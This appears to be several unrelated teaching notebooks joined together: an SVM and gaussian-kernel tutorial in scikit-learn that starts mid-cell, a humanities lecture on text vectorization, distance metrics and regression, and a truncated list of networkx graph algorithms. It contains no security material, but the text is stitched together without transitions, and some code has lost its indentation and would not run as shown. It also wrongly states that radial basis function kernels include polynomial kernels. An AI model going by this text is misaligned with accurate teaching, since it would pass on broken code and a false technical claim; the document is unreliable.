x1, x2 = np.meshgrid(np.arange(x1_min, x1_max, h),
np.arange(x2_min, x2_max, h))
x = np.c_[x1.ravel(), x2.ravel()]
Z = gauss(x, mu, sigma)
Z = Z.reshape(x1.shape)
# plot the 2 feature dimensional gaussian as a contour map
plt.contourf(x1, x2, Z, cmap=plt.cm.jet, alpha=0.8)
plt.colorbar()
plt.xlabel('$x_1$', fontsize=20)
plt.ylabel('$x_2$', fontsize=20);
# now plot as as a 3D surface plot
from mpl_toolkits.mplot3d import Axes3D
Z = Z.reshape(x1.shape)
fig = plt.figure(figsize=(12,12))
ax = fig.add_subplot(projection='3d')  # fig.gca(projection=...) was removed in newer matplotlib
surf = ax.plot_surface(x1, x2, Z, cmap=plt.cm.jet)
ax.set_xlabel('$x_1$', fontsize=20)
ax.set_ylabel('$x_2$', fontsize=20);
```
You should try changing the landmark location $\mu$ and the sigma value (which controls how fast the change in distance affects
the value of the gaussian function) in the previous cell.
As shown in the video (closer to the end), gaussian kernels allow for nonlinear decision boundaries. But unlike creating
an (exponential) combination of polynomial features, we can simply pick an appropriate number of gaussian kernels that will
likely produce a good enough decision boundary for our given set of data. As discussed in this video, a good way
of thinking of the gaussian kernels is as landmarks that are chosen (we discuss how to choose the landmarks in the next video)
and features are then simply similarity measures to the chosen set of landmarks.
# Video W7 05: Kernels II
[YouTube Video Link](https://www.youtube.com/watch?v=P9Xjvr2JfOk&index=75&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW)
In practice, landmarks for gaussian kernels are chosen by putting landmarks at each of the training example locations.
Thus the number of landmarks will grow linearly with the size of our training set data (instead of being a combinatorial
explosion in terms of the number of input features, as creating polynomial terms from the features tends to do).
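A minimal sketch of this idea: with one landmark per training example, each example is re-represented by its gaussian similarity to every landmark, so $m$ examples with $n$ raw features become $m$ examples with $m$ kernel features (the helper function name here is made up for illustration, not a library function):

```python
import numpy as np

def gaussian_kernel_features(X, landmarks, sigma=1.0):
    """Map each row of X to its gaussian similarity to every landmark.
    (Illustrative helper only.)"""
    # squared distance between every example and every landmark, via broadcasting
    diffs = X[:, np.newaxis, :] - landmarks[np.newaxis, :, :]
    sq_dists = np.sum(diffs ** 2, axis=2)
    return np.exp(-sq_dists / (2.0 * sigma ** 2))

X_train = np.array([[0.0, 0.0], [3.0, 5.0], [1.0, 1.0]])
F = gaussian_kernel_features(X_train, X_train, sigma=1.0)  # landmarks = training examples
print(F.shape)     # (3, 3): one similarity feature per landmark
print(np.diag(F))  # every example has similarity 1.0 to its own landmark
```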
# Video W7 06: Using an SVM
[YouTube Video Link](https://www.youtube.com/watch?v=wtno4WSDTlY&list=PLZ9qNFMHZ-A4rycgrgOYma6zxF4BZGGPW&index=76)
This video shows using SVM packages for octave/matlab. In this class we have been using Python, of course. There are many good
implementations of SVM in Python. For example, the libsvm mentioned in the video is actually a language neutral implementation
of svm, and there are extensions available to use libsvm in python:
[libsvm](https://www.csie.ntu.edu.tw/~cjlin/libsvm/)
As of the creation of this notebook, however (Fall 2015), I do recommend using the svm implementation
in the scikit learn library. It is the most mature and has the best (most consistent) user interface. You will have to install
scikit learn in your environment in order to use it. If you are using the Enthought Python environment, it should have been
installed for you. The documentation for the scikit learn svm library is [here](http://scikit-learn.org/stable/modules/svm.html).
As discussed in this video, sometimes we want to do an SVM classification, but not use any complex kernels, e.g. a
straightforward linear SVM classifier. If you want to do this, you should use the `SVC` in scikit learn with a linear kernel to
do a linear SVM classifier. For example, recall that in assignment 03 we used logistic regression to classify
exam score data (with a single class, admit or not admit) using a linear decision boundary. The data looked like this:
```
data = pd.read_csv('../../data/assg-03-data.csv', names=['exam1', 'exam2', 'admitted'])
x = data[['exam1', 'exam2']].values
y = data.admitted.values
m = y.size
print((x.shape))
print((y.shape))
print(m)
# note: no column of 1s is needed here; scikit learn adds the intercept term itself
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend();
```
Before we do a linear SVM, let's use the logistic regression functions from scikit learn to perform a logistic regression. Note that
scikit learn uses C rather than $\lambda$ to specify the amount of regularization. In our assignment we didn't use any regularization. We can get similar theta parameters by using a large C, which will do the optimization using mostly the cost, without
much weight for the regularization. But try it with more regularization (e.g. smaller C values), and you will see that the
decision boundary is still basically the same.
```
from sklearn import linear_model
logreg = linear_model.LogisticRegression(C=1e6, solver='lbfgs')
logreg.fit(x, y)
print((logreg.coef_)) # show the coefficients that were fitted to the data by logistic regression
print((logreg.intercept_))
```
Notice that for scikit learn we don't have to add in the column of 1's to the input data. By default, most scikit learn functions
will assume they need to add in such an intercept parameter. So there will only be two theta parameters in this case, but the
parameter corresponding to the intercept value is in a separate constant after we fit our model to the training data.
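To see how `coef_` and `intercept_` fit together, here is a small self-contained sketch (using made-up synthetic data and illustrative variable names, so as not to disturb the exam-score variables) that reproduces `predict()` by hand from those two attributes:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# made-up, clearly separated two-feature data
rng = np.random.RandomState(0)
x_syn = np.vstack([rng.randn(20, 2) + [2, 2], rng.randn(20, 2) - [2, 2]])
y_syn = np.array([1] * 20 + [0] * 20)

clf = LogisticRegression(C=1e6, solver='lbfgs')
clf.fit(x_syn, y_syn)

# reproduce predict() by hand: intercept_ holds the theta_0 term,
# coef_ holds the remaining theta parameters (no column of 1s needed)
z = clf.intercept_ + x_syn @ clf.coef_[0]
manual = (1.0 / (1.0 + np.exp(-z)) >= 0.5).astype(int)
print(np.array_equal(manual, clf.predict(x_syn)))  # True
```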
Here is a plot of the decision boundary that was found.
```
# display the decision boundary for the coeficients
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
# visualize the data points of the two categories
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
# add the decision boundary line
dec_xpts = np.arange(30, 93)
theta = logreg.coef_[0]
dec_ypts = - (logreg.intercept_ + theta[0] * dec_xpts) / theta[1]
plt.plot(dec_xpts, dec_ypts, 'b-');
```
Now let's use the linear SVM classifier from scikit learn to perform the same classification.
```
from sklearn import svm
linclf = svm.SVC(kernel='linear', C=1e6)
linclf.fit(x, y)
print((linclf.coef_)) # show the coefficients that were fitted to the data by logistic regression
print((linclf.intercept_))
```
Notice that the parameters found for the model and the intercept are a bit different, but these do actually correspond to
basically the same decision boundary as before. If we plot it you can see this is the case:
```
# display the decision boundary for the coeficients
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
# visualize the data points of the two categories
plt.plot(x[neg_indexes, 0], x[neg_indexes, 1], 'yo', label='Not admitted')
plt.plot(x[pos_indexes, 0], x[pos_indexes, 1], 'r^', label='Admitted')
plt.title('Admit/No Admit as a function of Exam Scores')
plt.xlabel('Exam 1 score')
plt.ylabel('Exam 2 score')
plt.legend()
# add the decision boundary line
dec_xpts = np.arange(30, 93)
theta = linclf.coef_[0]
dec_ypts = - (linclf.intercept_ + theta[0] * dec_xpts) / theta[1]
plt.plot(dec_xpts, dec_ypts, 'b-');
```
And finally, let's use an SVM with a gaussian kernel. It is not so interesting to use a nonlinear classifier with the
previous data, so let's make up some data, similar to the data shown in our companion video
of a class surrounded by another class. Here we use a function from the scikit learn library that can be used to create data
at random. The data has 2 features, and only 2 classes (either positive or negative, e.g. admitted or not
admitted). The random data generated from this function is centered at the origin (0, 0). The further away the data is from
the center, the more probable it is in another class (using a gaussian probability function). Thus with two classes we tend to get
a class inside surrounded by another class, with a basically circular decision boundary.
```
from sklearn.datasets import make_gaussian_quantiles
X, Y = make_gaussian_quantiles(n_features=2, n_classes=2)
neg_indexes = np.where(Y==0)[0]
pos_indexes = np.where(Y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative examples')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive examples');
```
Here then we will use a SVM with gaussian kernels to create a classifier for the data. Note that we specify 'rbf' for the
kernel, these are radial basis functions kernels. Radial basis function kernels include
gaussian functions, as well as the polynomial functions
discussed in our companion videos. You specify the gamma, degree and coef0 parameters to get the different types of kernel
functions that were discussed. Note that scikit learn's rbf kernel computes $\mathrm{exp}(-\gamma \|x - l\|^2)$, so gamma
plays the role of $\frac{1}{2\sigma^2}$ in our gaussian formula; a gamma of 0.5 corresponds to the simple gaussian kernel
(with $\sigma = 1$) shown in our videos.
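We can check the relationship between scikit learn's gamma parameter and our $\sigma$ directly: the `rbf_kernel` helper computes $\mathrm{exp}(-\gamma \|x - l\|^2)$, which matches our gaussian similarity when $\gamma = \frac{1}{2\sigma^2}$:

```python
import numpy as np
from sklearn.metrics.pairwise import rbf_kernel

x_pt = np.array([[1.0, 2.0]])   # a single 2-feature input
lmk = np.array([[3.0, 5.0]])    # the landmark from the video
sigma = 1.0
gamma = 1.0 / (2.0 * sigma ** 2)

# gaussian similarity computed by hand, as in our earlier gauss() function
by_hand = np.exp(-np.sum((x_pt - lmk) ** 2) / (2.0 * sigma ** 2))
print(np.isclose(rbf_kernel(x_pt, lmk, gamma=gamma)[0, 0], by_hand))  # True
```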
```
from sklearn import svm
rbfclf = svm.SVC(kernel='rbf', gamma=1.0)
rbfclf.fit(X, Y)
# Now display the results. We don't really have simple theta parameters anymore, the parameters are specifying
# relative values of the gaussian kernels now. In fact, rbclf.coef_ will not be defined for non linear kernels.
# Here we use an alternative method to visualize the decision boundary that was discovered.
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = rbfclf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(Y==0)[0]
pos_indexes = np.where(Y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative examples')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive examples')
plt.legend();
```
# More SciKit-Learn Examples
## Linear SVC on iris dataset
Use a LinearSVC (non-kernel) based SVM. LinearSVC will be much faster than using SVC and specifying a 'linear'
kernel.
```
from sklearn import datasets
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
iris = datasets.load_iris()
X = iris['data'][:, (2, 3)] # petal length, petal width
y = (iris['target'] == 2).astype(np.float64) # Iris-virginica
C = 1.0
svmclf = Pipeline([
    ("scaler", StandardScaler()),
    ("linear_svc", LinearSVC(C=C, loss='hinge')),
])
svmclf.fit(X, y)
svmclf.predict([[5.5, 1.7]])
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = svmclf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='other')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='Iris-virginica')
plt.legend();
plt.title('C = %f' % C)
```
## Moon data using Generated Polynomial Features
Example using the PolynomialFeatures class to create all feature combinations up to degree 3 polynomials here.
```
from sklearn.datasets import make_moons
from sklearn.preprocessing import PolynomialFeatures
X, y = make_moons(noise=0.1)
d = 3 # polynomial degree
C = 10
polynomial_svm_clf = Pipeline([
    ('poly_features', PolynomialFeatures(degree=d)),
    ('scaler', StandardScaler()),
    ('svm_clf', LinearSVC(C=C, loss='hinge')),
])
polynomial_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = polynomial_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, degree=%d' % (C, d))
```
## Polynomial Kernel
```
from sklearn.svm import SVC
d = 10
c0 = 100
C = 5
poly_kernel_svm_clf = Pipeline([
    ('scaler', StandardScaler()),
    ('svm_clf', SVC(kernel='poly', degree=d, coef0=c0, C=C)),
])
poly_kernel_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = poly_kernel_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, degree=%d, c0=%f' % (C, d, c0))
```
## Gaussian RBF Kernel
```
g = 5
C = 0.001
rbf_kernel_svm_clf = Pipeline([
    ('scaler', StandardScaler()),
    ('svm_clf', SVC(kernel='rbf', gamma=g, C=C)),
])
rbf_kernel_svm_clf.fit(X, y)
# visualize resulting decision boundary
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = rbf_kernel_svm_clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# plot the original data
neg_indexes = np.where(y==0)[0]
pos_indexes = np.where(y==1)[0]
plt.plot(X[neg_indexes, 0], X[neg_indexes, 1], 'yo', label='negative class')
plt.plot(X[pos_indexes, 0], X[pos_indexes, 1], 'r^', label='positive class')
plt.legend();
plt.title('C = %f, gamma = %f' % (C, g))
```
# Versions and Acknowledgements
```
import sys
sys.path.append("../../src") # add our class modules to the system PYTHON_PATH
from ml_python_class.custom_funcs import version_information
version_information()
```
# INFO 3350/6350
## Lecture 07: Vectorization, distance metrics, and regression
## To do
* Read HDA ch. 5 and Grimmer and Stewart for Monday (a lot of reading)
* HW3 (gender and sentiment; dictionary methods) due by Thursday night at 11:59.
* Extra credit for good, consistent answers on Ed
* Study groups are great for homeworks.
* Questions?
## Definitions
* What is a **vector**?
* An ordered collection of numbers that locate a point in space relative to a shared reference point (called the *origin*).
* We can also think of vectors as representing the quantified *features* of an object.
* Vectors are usually written as *row matrices*, or just as lists: $vec = [1.0, 0.5, 3.0, 1.2]$
* Vectors have as many *dimensions* as there are features of the object to represent.
* The number of features to represent is a choice of the experiment. There is no correct choice, though some choices are better than others for a given purpose.
* What is **vectorization**?
* The process of transforming an object into its vector representation, typically by measuring some of the object's properties.
## Why would we want to do this?
One goal of humanistic inquiry and of scientific research is to compare objects, so that we can gather them into types and compare any one object to others that we observe. Think of biological species or literary genres or historical eras. But how can we measure the difference or similarity between objects that are, after all, always necessarily individual and unique?
* Measuring the *properties* of objects lets us compare those objects to one another.
* But ... *which* properties?
* Example: We counted words by type to compare gender and sentiment in novels.
* Establishing a vector representation allows us to define a **distance metric** between objects that aren't straightforwardly spatial.
* "Distance" is a metaphor. Ditto "similarity."
* Nothing is, in itself, like or unlike anything else.
* We sometimes seek to assert that objects are similar by erasing aspects of their particularity.
* Measuring similarity and difference are (always and only) interpretive interventions.
## A spatial example
Consider this map of central campus:

**How far apart are Gates Hall (purple star) and the clock tower (orange star)?**
What do we need to know or define in order to answer this question?
* Where is each building in physical space.
* Latitude/longitude; meters north/south and east/west of the book store; etc.
* How do we want to measure the distance between them (walking, driving, flying, tunneling, ...). Minutes or miles?
Normal, boring answer: about 0.4 miles on foot via Campus Rd and Ho Plaza, or a bit less if you cut some corners, or less than 0.3 miles if you can fly.
| Clock tower | Gates Hall |
| --- | --- |
|  |  |
More interesting version: How far apart are these buildings conceptually? Architecturally? Historically?
* What are the features and metrics you would use to answer this question?
* This is a lot more like the problem of comparing texts.
## A textual example
```
text = '''\
My cat likes water.
The dog eats food.
The dog and the cat play together.
A dog and a cat meet another dog and cat.
The end.'''
# Print with sentence numbers
for line in enumerate(text.split('\n')):
print(line)
```
Let us stipulate that we want to compare these five sentences according to their "*dogness*" and "*catness*." We care about those two aspects alone, nothing else.
Let's develop some intuitions here:
* Sentences 0 and 1 are as far apart as can be: 0 is about cats, 1 is about dogs.
* Sentence 2 lies between 0 and 1. It contains a mix of dogness and catness.
* Sentence 3 is kind of like sentence 2, but it has twice as much of both dogness and catness.
* How different are sentences 2 and 3? (There's no objectively correct answer.)
* Sentence 4 is a zero point. It has no dogness or catness.
### Count relevant words
||**cat**|**dog**|
|---|---|---|
|**sent**| | |
|0|1|0|
|1|0|1|
|2|1|1|
|3|2|2|
|4|0|0|
The **vector representation** of sentence 0 is `[1, 0]`. The vector representation of sentence 3 is `[2, 2]`. And so on ...
### Visualize (scatter plot)
Sketch this by hand ...
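... or, as a quick matplotlib version of the hand sketch, place each sentence's `(cat, dog)` count vector in feature space:

```python
import matplotlib.pyplot as plt

# (cat, dog) count vectors for sentences 0-4, from the table above
vectors = [(1, 0), (0, 1), (1, 1), (2, 2), (0, 0)]
plt.figure()
for i, (cat, dog) in enumerate(vectors):
    plt.scatter(cat, dog)
    plt.annotate(f'sent {i}', (cat, dog))
plt.xlabel('cat count')
plt.ylabel('dog count')
plt.title('Sentences in cat/dog feature space');
```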
### Distance measures
How far apart are sentences 0 and 1 (and all the rest)?
#### Manhattan distance
* Also called "city block" distance.
* Not much used, but easy to understand and to compute (which matters for very large data sets).
* Sum of the absolute difference in each dimension.
For **sentences 0 and 1**, the Manhattan distance = |1 - 0| + |0 - 1| = 2.
#### Euclidean distance
* Straight-line or "as the crow flies" distance.
* Widely used in data science, but not always the best choice for textual data.
Recall the Pythagorean theorem for the hypotenuse of a triangle: $a^2 = b^2 + c^2$ or $a = \sqrt{b^2 +c^2}$.
For **sentences 0 and 1**, the Euclidean distance = $\sqrt{1^2 + 1^2} = \sqrt{2} = 1.414$.
OK, but what about the Euclidean distance between **sentence 0 and sentence 3**? Well, that distance = $\sqrt{1^2 + 2^2} = \sqrt{5} = 2.24$.
And between **sentences 2 and 3** (both balanced 50:50 between dogs and cats)? That's 1.4 again, the same as the distance between sentences 0 and 1 (which, recall, are totally divergent in dog/cat content).
An obvious improvement in this case would be to **normalize word counts by document length**.
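A small numpy check of the numbers above, including what length normalization buys us: after scaling each vector to unit length, sentences 2 and 3 (the same 50:50 mix at different lengths) become indistinguishable:

```python
import numpy as np

s0, s1 = np.array([1.0, 0.0]), np.array([0.0, 1.0])  # sentences 0 and 1
s2, s3 = np.array([1.0, 1.0]), np.array([2.0, 2.0])  # sentences 2 and 3

print(np.sum(np.abs(s0 - s1)))   # Manhattan distance: 2.0
print(np.linalg.norm(s0 - s1))   # Euclidean distance: ~1.414
print(np.linalg.norm(s2 - s3))   # also ~1.414, despite identical dog/cat mixes!

def unit(v):
    """Scale a vector to unit length (a simple form of length normalization)."""
    return v / np.linalg.norm(v)

print(np.linalg.norm(unit(s2) - unit(s3)))  # 0.0: the normalized vectors coincide
```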
#### Cosine distance
Maybe instead of distance, we could measure the difference in **direction** from the origin between points.
* **Sentences 0 and 1** are 90 degrees apart.
* **Sentences 2 and 3** are 0 degrees apart.
* **Sentences 0 and 1** are each 45 degrees away from **sentences 2 and 3**.
Now, recall the values of the **cosine** of an angle between 0 and 90 degrees. (Sketch by hand)
So, the cosines of the angles between sentences are:
sentences|angle|cosine
---|---|---
0 and 1|90|0
2 and 3|0|1
0 and 2|45|0.707
0 and 3|45|0.707
1 and 2|45|0.707
We could then transform these cosine **similarities** into **distances** by subtracting them from 1, so that the most *dissimilar* sentences (like 0 and 1) have the greatest distance between them.
The big advantage here is that we don't need to worry about getting length normalization right. Cosine distance is often a good choice for text similarity tasks.
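The table above can be verified with a few lines of numpy (note that sentence 4, the zero vector, has no direction, so its cosine similarity to anything is undefined):

```python
import numpy as np

def cosine_sim(a, b):
    # cosine of the angle between two vectors: dot product over product of lengths
    return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))

s0, s1 = np.array([1.0, 0.0]), np.array([0.0, 1.0])
s2, s3 = np.array([1.0, 1.0]), np.array([2.0, 2.0])

print(round(cosine_sim(s0, s1), 3))   # 0.0: 90 degrees apart
print(round(cosine_sim(s2, s3), 3))   # 1.0: same direction
print(round(cosine_sim(s0, s2), 3))   # 0.707: 45 degrees apart
print(1 - cosine_sim(s0, s1))         # cosine *distance* = 1 - similarity
```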
#### Higher dimensions
All of these metrics can be calculated in arbitrarily many dimensions. Which is good, because textual data is often very high-dimensional. Imagine counting the occurrences of each word type in a large corpus of novels or historical documents. Can easily be tens of thousands of dimensions.
## In the real world
* There's nothing wrong with any of these vectorizations and distance metrics, exactly, but they're not state of the art.
* If you've done some recent NLP work, you'll know that, at the very least, you'd want to use static word embeddings in place of raw tokens.
* This allows you to capture the similarity of meaning between, e.g., "cat" and "kitten."
* If you were especially ambitious, you'd be looking at something like BERT or ELMo or GPT-2/3, etc.
* These transformer-based methods allow for *contextual* embeddings, that is, they represent a word token differently depending on the context in which it appears, so that the representation of "bank" in "my money is in the bank" is different from the representation of "bank" in "we walked along the bank of the river."
* We'll touch on contextual embeddings near the end of the semester.
* And then you might want features that correspond to aspects of a text other than the specific words it contains.
* When was it written?
* By *whom* was it written?
* How long is it?
* In what style is it written?
* Who read it?
* How much did it cost?
* How many people read or reviewed it?
* What else did its readers also read?
* And so on ...
Here, though, we're trying to grasp the *idea* behind document similarity, on which all of these methods depend: transform text into a numeric representation of its features (often, a representation of its content or meaning), then quantify the difference or similarity between those numeric representations.
## In the problem set world
We'll dig into how, as a practical matter, we can vectorize texts and calculate distance metrics in this week's problem set.
We'll use `scikit-learn` to implement vectorization and distance metrics. The `scikit-learn` API almost always involves *three* steps:
1. Instantiate a learning object (such as a vectorizer, regressor, classifier, etc.). This is the object that will hold the parameters of your fitted model.
1. Call the instantiated learning object's `.fit()` method, passing in your data. This allows the model to learn the optimal parameters from your data.
1. Call the fitted model's `.transform()` or `.predict()` method, passing in either the same data from the `fit` step or new data. This step uses the fitted model to generate outputs given the input data you supply.
For example:
```
from sklearn.feature_extraction.text import CountVectorizer
# get example text as one doc per line
docs = [sent for sent in text.split('\n')]
# instantiate vectorizer object
# note setup options
vectorizer = CountVectorizer(
vocabulary=['cat', 'dog']
)
# fit to data
vectorizer.fit(docs)
# transform docs to features
features = vectorizer.transform(docs)
# print output feature matrix
print(vectorizer.get_feature_names_out())
print(features.toarray())
# calculate distances
from sklearn.metrics.pairwise import euclidean_distances, cosine_distances, cosine_similarity
import numpy as np
print("Euclidean distances")
print(np.round(euclidean_distances(features),2))
print("\nCosine distances")
print(np.round(cosine_distances(features),2))
print("\nCosine **similarities**")
print(np.round(cosine_similarity(features),2))
# FYI, a heatmap vis
import seaborn as sns
print("Euclidean distances")
sns.heatmap(
euclidean_distances(features),
annot=True,
square=True
);
```
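Under the hood, cosine similarity is just the dot product of two vectors divided by the product of their lengths. A minimal numpy sketch, using made-up two-word count vectors:

```python
import numpy as np

# Hypothetical count vectors for ['cat', 'dog'] in two documents
a = np.array([2.0, 1.0])
b = np.array([4.0, 2.0])

# Cosine similarity: dot product over the product of vector lengths
cos_sim = np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
cos_dist = 1 - cos_sim  # cosine distance is 1 minus similarity

print(round(cos_sim, 2), round(cos_dist, 2))  # 1.0 0.0
```

Note that `b` is just `a` scaled by 2, so the two "documents" point in the same direction and have cosine distance 0 even though their Euclidean distance is not 0.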
## Regression
We are often interested in the relationships between measured properties of texts, or between a textual property and some other variable (year of publication, number of sales, and so on).
Maybe the most basic way to measure the relationship between two variables is to use **linear regression**. The idea is to calculate a straight line through your data such that the average distance between the observed data points and the line is as small as possible.
(Sketch what this looks like)
You can then calculate the **coefficient of determination**, written $r^2$ ("r squared"), which measures the fraction of the variation in the dependent (y) variable that is predictable from the independent (x) variable.
$r^2$ = 1 - (sum of squared residuals)/(total sum of squares)
An $r^2$ value of 1 indicates perfect correlation between the variables; zero means no correlation.
* There's a *lot* more to this. We'll spend some time on it later in the semester.
* For now, focus on the fact that regression is a way to calculate a line of best fit through a data set.
* Notice that we could also try to find something like a "line of *worst* fit," which we could think of as the dividing line between two regions of feature space. This would be something like the line on which we are least likely to encounter any actual data points.
* Think about what use-value such a dividing line might have ...
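The line-of-best-fit and $r^2$ calculations above can be sketched with numpy on made-up data:

```python
import numpy as np

# Made-up data: y is roughly 2x + 1 with a little noise
x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
y = np.array([3.1, 4.9, 7.2, 9.0, 10.8])

# Fit a straight line y = slope*x + intercept by least squares
slope, intercept = np.polyfit(x, y, 1)
y_hat = slope * x + intercept

# r^2 = 1 - (sum of squared residuals) / (total sum of squares)
ss_res = np.sum((y - y_hat) ** 2)
ss_tot = np.sum((y - y.mean()) ** 2)
r_squared = 1 - ss_res / ss_tot

print(round(slope, 2), round(intercept, 2), round(r_squared, 3))  # 1.95 1.15 0.998
```

An $r^2$ this close to 1 just reflects that the made-up data were generated to lie almost exactly on a line; real textual data are rarely so tidy.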
## Algorithm - II
### Clustering, Link Analysis, Node Classification, Link Prediction
```
import matplotlib.pyplot as plt
import networkx as nx
import seaborn as sns
sns.set()
%matplotlib inline
import warnings
import matplotlib.cbook
warnings.filterwarnings("ignore",category=matplotlib.cbook.mplDeprecation)
G = nx.karate_club_graph()
nx.draw(G, node_size = 500, node_color = "lightblue", with_labels = True)
```
### Clustering
Algorithms to characterize the number of triangles in a graph.
- ```triangles(G[, nodes])``` Compute the number of triangles.
- ```transitivity(G)``` Compute graph transitivity, the fraction of all possible triangles present in G.
- ```clustering(G[, nodes, weight])``` Compute the clustering coefficient for nodes.
- ```average_clustering(G[, nodes, weight, …])``` Compute the average clustering coefficient for the graph G.
- ```square_clustering(G[, nodes])``` Compute the squares clustering coefficient for nodes.
- ```generalized_degree(G[, nodes])``` Compute the generalized degree for nodes.
```
nx.triangles(G)
nx.transitivity(G)
nx.clustering(G)
```
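As a sanity check on the definitions above, `average_clustering` is simply the mean of the per-node `clustering` values, while `transitivity` weights high-degree nodes more heavily, so the two generally differ:

```python
import networkx as nx

G = nx.karate_club_graph()

# average_clustering is the mean of the per-node clustering coefficients
per_node = nx.clustering(G)
avg = nx.average_clustering(G)

print(abs(avg - sum(per_node.values()) / len(per_node)) < 1e-9)  # True
print(round(avg, 3), round(nx.transitivity(G), 3))
```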
--------------
### Link Analysis
#### PageRank
PageRank analysis of graph structure.
- ```pagerank(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```pagerank_numpy(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```pagerank_scipy(G[, alpha, personalization, …])``` Returns the PageRank of the nodes in the graph.
- ```google_matrix(G[, alpha, personalization, …])``` Returns the Google matrix of the graph.
```
nx.pagerank(G)
nx.google_matrix(G)
```
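Under the hood, `pagerank` runs a damped power iteration on a (column-stochastic) transition matrix. A minimal numpy sketch on a hypothetical 3-node directed graph (edges 0→1, 0→2, 1→2, 2→0):

```python
import numpy as np

# M[j, i] = 1/outdegree(i) if there is an edge i -> j, else 0
M = np.array([[0.0, 0.0, 1.0],
              [0.5, 0.0, 0.0],
              [0.5, 1.0, 0.0]])

alpha, n = 0.85, 3          # damping factor and node count
rank = np.ones(n) / n       # start from the uniform distribution

# Repeatedly apply the damped transition until convergence
for _ in range(100):
    rank = alpha * (M @ rank) + (1 - alpha) / n

print(np.round(rank, 3))    # the ranks sum to 1
```

Node 2 ends up with the highest rank because it receives links from both other nodes, including all of node 1's weight.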
------------
#### Hits
Hubs and authorities analysis of graph structure.
- ```hits(G[, max_iter, tol, nstart, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hits_numpy(G[, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hits_scipy(G[, max_iter, tol, normalized])``` Returns HITS hubs and authorities values for nodes.
- ```hub_matrix(G[, nodelist])``` Returns the HITS hub matrix.
